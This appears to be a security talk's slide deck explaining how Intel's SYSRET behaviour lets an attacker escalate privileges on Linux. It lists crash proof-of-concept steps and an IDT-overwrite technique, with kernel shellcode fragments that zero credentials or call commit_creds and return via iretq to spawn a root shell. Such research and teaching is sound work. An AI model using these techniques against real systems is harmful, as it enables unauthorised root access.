Exploiting the Linux Kernel via 
Intel's SYSRET Implementation 
Niko@FluxFingers
Outline 
● Syscalls and Context Switches 
● Canonical Addresses 
● SYSRET #GP Triggering 
● Step by Step Exploitation and Rooting
Linux x86_64 Syscalls 
● On old x86 processors, syscalls used int $0x80 with the syscall number in %eax and parameters in %ebx, %ecx, etc.
○ However, this is slow and was replaced by Intel’s SYSENTER mechanism
● x86_64 uses AMD’s SYSCALL with the number in %rax and parameters in %rdi, %rsi, %rdx, %r10, %r8, %r9
○ %rcx is not used for arguments because SYSCALL overwrites it with the return %rip (and %r11 with RFLAGS)
○ Faster to handle than the whole interrupt path
○ Intel CPUs adopted SYSCALL as specified by AMD, since it became the standard syscall mechanism
SYSCALL/SYSRET 
● Whenever a syscall is invoked via SYSCALL, a context switch to kernel mode takes place
○ When leaving the syscall, the kernel needs to restore specific userland registers
○ And transfer back to ring3 with SYSRET
● SYSRET is fast since it “only” needs to:
○ Load the saved %rip from %rcx (and RFLAGS from %r11)
○ Switch %cs and %ss back to ring3 selectors
● The kernel itself has to make sure to restore all other userland registers, including %rsp, before executing SYSRET
SYSCALL/SYSRET
[Figure: x86_64 Linux address space of a process, lowest to highest address]
0x0000000000000000
0x0000000000400000   Process (/bin/cat): .text
0x00000000006XXXXX   .data, .bss, Heap
0x00007fXXXXXXXXXX   Shared Libraries
0x00007ffffXXXXXXX   Stack
0xffffffff80000000   Kernel Memory
0xffffffffff600000   VSYSCALL
● SYSCALL transfers control from userland into kernel memory; SYSRET transfers it back
How Linux handles SYSRET 
● arch/x86/kernel/entry_64.S: 
ret_from_sys_call: 
movl $_TIF_ALLWORK_MASK,%edi 
... 
sysret_check: 
... 
movq RIP-ARGOFFSET(%rsp),%rcx 
CFI_REGISTER rip,rcx 
RESTORE_ARGS 1,-ARG_SKIP,0 
movq PER_CPU_VAR(old_rsp), %rsp 
USERGS_SYSRET64 
● The kernel restores the userland %rsp (from old_rsp), swaps %gs back to the user value (on native hardware USERGS_SYSRET64 is swapgs; sysretq) and finally executes SYSRET
Canonical Addresses 
● On x86_64, registers are 64 bits wide
● Virtual addresses, and therefore %rip, only use 48 bits
○ 48 bits are a balance between page-table depth and the amount of addressable memory
● The upper bits are not free for CPU-specific tricks
○ (The NX bit at position 63 lives in page-table entries, not in addresses)
● Meaning the value of %rip has to be “canonical”, i.e. within
○ 0x0000000000000000 -> 0x00007FFFFFFFFFFF
○ 0xFFFF800000000000 -> 0xFFFFFFFFFFFFFFFF
● (Bits 48..63 have to be copies of bit 47)
● Non-canonical values are not allowed: using one as a code or data address raises an exception (#GP, or #SS for stack accesses)
Non-canonical addresses and SYSRET 
● Whenever SYSRET is executed with a non-canonical value in %rcx, the CPU raises a #GP
● AMD’s specification, however, never defined exactly when the #GP happens
● Researchers working on Xen found that AMD CPUs raise the #GP only once back in user mode
● Not so on Intel ...
Intel’s Version of SYSRET 
● AMD’s specs omitted the check for non-canonical 
values in %rcx / %rip 
● Intel decided to check for non-canonical values 
before the privilege level is changed
Intel’s Version of SYSRET 
● Triggering a #GP from kernel mode has consequences on Linux
● Recall that prior to executing SYSRET, Linux restores the userland %rsp and swaps %gs back
● Intel’s SYSRET raises the #GP while still in ring0
○ There is no privilege change, so the CPU does not switch stacks and pushes the exception frame onto the userland %rsp
#GP on userland %rsp 
● #GP is an exception reached via an IDT entry: 
arch/x86/kernel/traps.c: 
set_intr_gate(X86_TRAP_GP, general_protection); 
● general_protection is generated by the errorentry macro in arch/x86/kernel/entry_64.S, which calls error_entry:
.macro errorentry sym do_sym 
ENTRY(sym) 
XCPT_FRAME 
ASM_CLAC 
PARAVIRT_ADJUST_EXCEPTION_FRAME 
subq $ORIG_RAX-R15, %rsp 
CFI_ADJUST_CFA_OFFSET ORIG_RAX-R15 
call error_entry 
...
#GP on userland %rsp 
● error_entry builds the exception frame on the current stack and backs up all general-purpose registers:
ENTRY(error_entry) 
XCPT_FRAME 
CFI_ADJUST_CFA_OFFSET 15*8 
cld 
movq_cfi rdi, RDI+8 
movq_cfi rsi, RSI+8 
movq_cfi rdx, RDX+8 
… 
● where movq_cfi is defined as 
.macro movq_cfi reg offset=0 
movq %reg, offset(%rsp) 
CFI_REL_OFFSET reg, offset 
.endm
#GP on userland %rsp 
● When setting up the stack frame, error_entry saves all (general-purpose) registers to x(%rsp) / [rsp+x]
● But the kernel had already restored the userland %rsp and registers before SYSRET
● => Attacker-controlled values are written to an attacker-chosen address while in ring0
● Classic opportunity for privilege escalation
Linux’ Protection against n/c %rip 
● This behaviour already bit Linux in 2006 (CVE-2006-0744)
● A SYSCALL instruction in the last bytes below 0x800000000000 would return to a non-canonical %rip
● To make sure no code ends up in (or right before) the non-canonical address space, a guard page was introduced
● mmap(0x7ffffffff000, 4096, PROT_READ …) returns ENOMEM
● This way SYSRET “shouldn’t” return to any n/c address
Linux’ Protection against n/c %rip 
● Another possibility is using a “safe” IRET path for returning back to ring3
○ IRET needs the saved ring3 state (%rip, %cs, RFLAGS, %rsp, %ss) on the stack
○ It is slower than SYSRET
● The ptrace interface forces the IRET path most of the time
● However, some syscalls still use the SYSRET path even while being ptraced
● One example is fork(): it reports to the tracer via ptrace_event(), which does not force IRET
Crash PoC 
● fork() a child 
● Child sets PTRACE_TRACEME
● Child raises SIGSTOP
● Parent sets PTRACE_O_TRACEFORK
● Child fork()s again
● Parent catches this fork event
● And uses PTRACE_SETREGS to set %rip to a non-canonical address
● Sets %rsp to an arbitrary address
● And continues the child with PTRACE_CONT
● fork() returns via SYSRET with a non-canonical %rcx
● The CPU raises #GP, then a page fault, then a double fault, and the kernel panics
How to get root
The plan 
● We need to get Kernel Code Execution between 
the #GP and Panic 
● Then restore the damage we have done 
● Set credentials of current process to 0 
● Return back to userland 
● And open a shell
The target 
● Since the #GP will always be followed by a page fault and a double fault, we can point %rsp into the IDT
● And set 2 specific registers to craft a fake IDT gate
● That gate replaces the original page-fault or double-fault handler entry
IDT Layout 
● We can read the IDTR (IDT base and limit) with the sidt instruction
IDT Gate Entry
● And set up a new gate with modified “Offsets”
The target 
● Before we trigger the #GP, we allocate a landing area in userland
● Where we copy the code that will be executed
● We craft a fake IDT gate that points to this area
● Triggering the #GP then overwrites e.g. the double-fault entry with the fake gate
● And the kernel jumps to userland and executes our code with kernel privileges
Kernel Shellcode 
● Inside this code we will have to swapgs in order to 
access kernel structures 
● Then we carefully rebuild all IDT entries that were 
trashed in the overwrite process 
● Then we can raise process credentials
Process structures 
● Each process in userland has an associated kernel 
structure (thread_union) that builds the kernel 
stack: 
[Figure: thread_union, made of thread_info followed by the kernel stack]
Process structures 
● thread_info itself has an element that points to 
task_struct 
[Figure: thread_info, whose members include *task_struct and *exec_domain, …]
Process structures < 2.6.29 
● task_struct contains lots of info about the running 
task 
● and its credentials 
[Figure: task_struct with state, stack, usage, ..., uid, gid, caps, ...]
Process structures < 2.6.29 
[Figure: thread_union (thread_info + kernel stack); thread_info’s *task_struct points to task_struct (state, stack, usage, ..., uid, gid, caps, ...)]
Kernel Shellcode 
● On < 2.6.29, raising process credentials is a matter of finding uid, gid and caps in task_struct
● And patching them to 0
● Luckily, %gs in kernel mode points to the per-CPU x8664_pda (/include/asm-x86/pda.h)
/* Per processor datastructure. %gs points to it while the kernel runs */ 
struct x8664_pda { 
struct task_struct *pcurrent; /* 0 Current process */ 
unsigned long data_offset; /* 8 Per cpu data offset from linker address */ 
unsigned long kernelstack; /* 16 top of kernel stack for current */ 
unsigned long oldrsp; /* 24 user rsp for system call */ 
int irqcount; /* 32 Irq nesting counter. Starts with -1 */ 
int cpunumber; /* 36 Logical CPU number */ 
#ifdef CONFIG_CC_STACKPROTECTOR 
unsigned long stack_canary; 
...
Kernel Shellcode 
● %gs:0 holds pcurrent, the pointer to the current task_struct
● So we can simply:
asm("movq %%gs:0, %0" : "=r"(ptr)); 
cred = (uint32_t *)ptr; 
for (i = 0; i < 1000; i++, cred++) { 
if (cred[0] == uid && cred[1] == uid && cred[2] == uid && cred[3] == uid && 
cred[4] == gid && cred[5] == gid && cred[6] == gid && cred[7] == gid) { 
cred[0] = cred[1] = cred[2] = cred[3] = 0; 
cred[4] = cred[5] = cred[6] = cred[7] = 0; 
● Where uid/gid are the values returned by getuid() and getgid()
● And our process will be root
Kernel Shellcode 
● On > 2.6.29, x8664_pda is removed
● And task_struct contains a new member called cred (credential records)
● If %rsp weren’t modified, we could round it down to the start of the stack area to find thread_info
● And do heuristic scanning to find thread_info->task_struct->cred->uid/gid
● However, credential records come with two new functions
● prepare_kernel_cred / commit_creds
Kernel Shellcode 
● prepare_kernel_cred creates a new clean 
credentials structure 
● commit_creds installs the new cred to the current 
task 
● Both symbols’ addresses can be looked up in /proc/kallsyms or /boot/System.map
● Kernel shellcode just needs to 
commit_creds(prepare_kernel_cred(0)); 
● And we’re root again
Kernel Shellcode 
● Next we will have to cleanly return back to 
userland 
● Easiest method is to use IRET: 
__asm__ __volatile__( 
"movq %0, 0x20(%%rsp);" 
"movq %1, 0x18(%%rsp);" 
"movq %2, 0x10(%%rsp);" 
"movq %3, 0x08(%%rsp);" 
"movq %4, 0x00(%%rsp);" 
"swapgs;" 
"iretq;" 
:: "i"(USER_SS), 
"i"(user_stack), 
"i"(USER_FL), 
"i"(USER_CS), 
"i"(user_code) 
); 
● Where user_code points to memory in userland 
that should be executed when kernel exits
Popping uid=0(root) 
● user_code can do anything now since it runs as root
● So we can simply execve("/bin/sh") from there
● However, that happens inside the child, so we have to bring the root shell back to the parent
● Or we just chmod() or setxattr() to drop a root shell
Demo Time
Limitations
● These techniques work well with 2.6.18 - 3.9.X
● 3.10 mitigates the IDT attack by mapping the IDT read-only (arch/x86/kernel/traps.c):
__set_fixmap(FIX_RO_IDT, __pa_symbol(idt_table), PAGE_KERNEL_RO); 
idt_descr.address = fix_to_virt(FIX_RO_IDT); 
● CPUs with SMEP/SMAP, when enabled by the kernel, fault when ring0 executes (SMEP) or accesses (SMAP) userland memory
● Grsecurity provides a handful of protections that make this bug a pain to exploit
○ GRKERNSEC_RANDSTRUCT 
○ PAX_MEMORY_UDEREF 
○ GRKERNSEC_HIDESYM 
○ ...
Further thoughts 
● The Linux fix is odd (it “only” forces ptrace_stop() to use IRET)
● Syscalls can still return via SYSRET
● The underlying SYSRET behaviour is still present in the hardware
● Since it’s a hardware issue, it might be present in other OSes in different variations (OHAI 2006)
● Anyone want to check FreeBSD …?
Questions?
